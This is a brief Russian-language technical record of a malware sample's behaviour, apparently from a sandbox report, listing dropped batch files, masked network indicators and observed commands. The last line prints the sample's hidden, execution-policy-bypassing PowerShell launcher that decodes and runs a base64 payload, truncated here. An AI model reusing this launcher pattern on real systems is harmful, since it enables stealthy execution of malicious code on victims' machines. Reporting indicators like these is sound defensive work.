Техническая информация
- %TEMP%\ancyloxypha.bat
- %HOMEPATH%\aoc.bat
- 'ap#.##legram.org':443
- '31.##.204.73':1414
- 'ap#.##legram.org':443
- DNS ASK ap#.##legram.org
- '<SYSTEM32>\cmd.exe' /c %TEMP%\Ancyloxypha.bat
- '<SYSTEM32>\cmd.exe' /c start "" /min "%TEMP%\Ancyloxypha.bat"
- '<SYSTEM32>\cmd.exe' /K "%TEMP%\Ancyloxypha.bat"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -w h -noni -ep bypass -c ""iex([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(('CgAKACQAYwA9ACcASAA0AHMASQBBAEEAQQBnusivlrrwsswBAEEAQQBBAEUAQQBIADIAUgAwAFcAcQBEAEnusivlrrws...